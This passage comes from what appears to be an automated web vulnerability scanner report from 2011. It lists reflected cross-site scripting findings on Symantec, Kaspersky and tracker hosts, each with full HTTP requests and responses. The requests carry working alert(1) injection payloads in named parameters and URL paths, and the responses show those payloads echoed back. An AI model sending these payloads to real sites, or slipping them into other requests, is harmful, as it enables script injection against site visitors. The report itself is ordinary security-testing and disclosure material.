var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...

...[SNIP]...

1.23. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._IPV parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://symantec.tt.omtrdc.net
Path:	/m2/symantec/mbox/standard

Issue detail

The value of the profile._IPV request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72b62'%3balert(1)//3d546e6880f was submitted in the profile._IPV parameter. This input was echoed as 72b62';alert(1)//3d546e6880f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=&profile._IPD=Symantec&profile._IPV=72b62'%3balert(1)//3d546e6880f&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:22 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...

...[SNIP]...

1.24. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._LANGUAGE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://symantec.tt.omtrdc.net
Path:	/m2/symantec/mbox/standard

Issue detail

The value of the profile._LANGUAGE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94177'%3balert(1)//fd44a2d4e63 was submitted in the profile._LANGUAGE parameter. This input was echoed as 94177';alert(1)//fd44a2d4e63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en94177'%3balert(1)//fd44a2d4e63&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:06 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...

...[SNIP]...

1.25. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._PGM_ID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://symantec.tt.omtrdc.net
Path:	/m2/symantec/mbox/standard

Issue detail

The value of the profile._PGM_ID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb89b'%3balert(1)//5012da3bc22 was submitted in the profile._PGM_ID parameter. This input was echoed as cb89b';alert(1)//5012da3bc22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=cb89b'%3balert(1)//5012da3bc22&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:11 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...

...[SNIP]...

1.26. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._PGM_TYPE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://symantec.tt.omtrdc.net
Path:	/m2/symantec/mbox/standard

Issue detail

The value of the profile._PGM_TYPE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7642'%3balert(1)//f2928718417 was submitted in the profile._PGM_TYPE parameter. This input was echoed as d7642';alert(1)//f2928718417 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWNd7642'%3balert(1)//f2928718417&profile._IPC=&profile._IPF=&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:13 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...

...[SNIP]...

1.27. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._SUBCHANNEL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://symantec.tt.omtrdc.net
Path:	/m2/symantec/mbox/standard

Issue detail

The value of the profile._SUBCHANNEL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66983'%3balert(1)//a3bf71ee914 was submitted in the profile._SUBCHANNEL parameter. This input was echoed as 66983';alert(1)//a3bf71ee914 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)66983'%3balert(1)//a3bf71ee914&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:04 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...

...[SNIP]...

1.28. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._TRAFFIC_SOURCE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://symantec.tt.omtrdc.net
Path:	/m2/symantec/mbox/standard

Issue detail

The value of the profile._TRAFFIC_SOURCE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61663'%3balert(1)//ae06d88f6e7 was submitted in the profile._TRAFFIC_SOURCE parameter. This input was echoed as 61663';alert(1)//ae06d88f6e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom61663'%3balert(1)//ae06d88f6e7&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:08 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...

...[SNIP]...

1.29. http://trk.enecto.com/trk/3 [z parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trk.enecto.com
Path:	/trk/3

Issue detail

The value of the z request parameter is copied into the HTML document as plain text between tags. The payload 60349<script>alert(1)</script>94bfd79debe was submitted in the z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trk/3?z=e6e604ff60349<script>alert(1)</script>94bfd79debe&c=8a8484e52ca20cfe012d08efc11a2010&m=http:&s=null&i=pv&y=1319387831443&e=UTF-8&d=de.trendmicro.com&p=%2Fde%2Fhome%2F&q=&t=Antiviren-%20und%20Content-Security-Software%20%7C%20Securing%20Your%20Web%20World%20-%20Trend%20Micro%20DE&r=http%3A%2F%2Fus.trendmicro.com%2Fus%2Ftrendwatch%2Fcloud%2Fsmart-protection-network%2F&a=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F14.0.835.202%20Safari%2F535.1 HTTP/1.1
Host: trk.enecto.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://de.trendmicro.com/de/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:37:27 GMT
Server: Apache
X-Powered-By: Enecto
Vary: Accept-Encoding
Content-Length: 164
Connection: close
Content-Type: application/x-javascript;charset=ISO-8859-1

_epf._reqs['e6e604ff60349<script>alert(1)</script>94bfd79debe'] = '8a8482b332ecaa81013331a4da54161b';
_epf.cb('e6e604ff60349<script>alert(1)</script>94bfd79debe');

1.30. http://usa.kaspersky.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c24f"><script>alert(1)</script>e204753faca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4c24f"><script>alert(1)</script>e204753faca=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.av-comparatives.org/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:26:29 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387189"
Content-Type: text/html; charset=utf-8
Content-Length: 44076
Date: Sun, 23 Oct 2011 16:26:32 GMT
X-Varnish: 1652536625
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/?4c24f"><script>alert(1)</script>e204753faca=1" />
...[SNIP]...

1.31. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b168b"><script>alert(1)</script>08a34ba8bb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modulesb168b"><script>alert(1)</script>08a34ba8bb1/search/search.css?3 HTTP/1.1
Host: usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070
Cookie: s_nr=1315139281476-New; __utma=205612169.840720245.1315139229.1315139229.1315139229.1; __utmz=205612169.1315139229.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|2731B73B85012EFC-40000107200595CE[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 17:14:07 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319390047"
Content-Type: text/html; charset=utf-8
Content-Length: 40928
Date: Sun, 23 Oct 2011 17:14:10 GMT
X-Varnish: 1652689590
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modulesb168b"><script>alert(1)</script>08a34ba8bb1/search/search.css?3" />
...[SNIP]...

1.32. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97778"-alert(1)-"44132cf691b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules97778"-alert(1)-"44132cf691b/search/search.css?3 HTTP/1.1
Host: usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070
Cookie: s_nr=1315139281476-New; __utma=205612169.840720245.1315139229.1315139229.1315139229.1; __utmz=205612169.1315139229.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|2731B73B85012EFC-40000107200595CE[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 17:14:25 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319390065"
Content-Type: text/html; charset=utf-8
Content-Length: 40480
Date: Sun, 23 Oct 2011 17:14:42 GMT
X-Varnish: 1652690838
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
es') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules97778"-alert(1)-"44132cf691b/search/search.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.33. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54ddb"><script>alert(1)</script>50a7a4548a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search54ddb"><script>alert(1)</script>50a7a4548a9/search.css?3 HTTP/1.1
Host: usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070
Cookie: s_nr=1315139281476-New; __utma=205612169.840720245.1315139229.1315139229.1315139229.1; __utmz=205612169.1315139229.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|2731B73B85012EFC-40000107200595CE[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 17:15:50 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319390150"
Content-Type: text/html; charset=utf-8
Content-Length: 40631
Date: Sun, 23 Oct 2011 17:15:55 GMT
X-Varnish: 1652695929
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search54ddb"><script>alert(1)</script>50a7a4548a9/search.css?3" />
...[SNIP]...

1.34. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b116"-alert(1)-"ce9764fe5ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/search8b116"-alert(1)-"ce9764fe5ac/search.css?3 HTTP/1.1
Host: usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
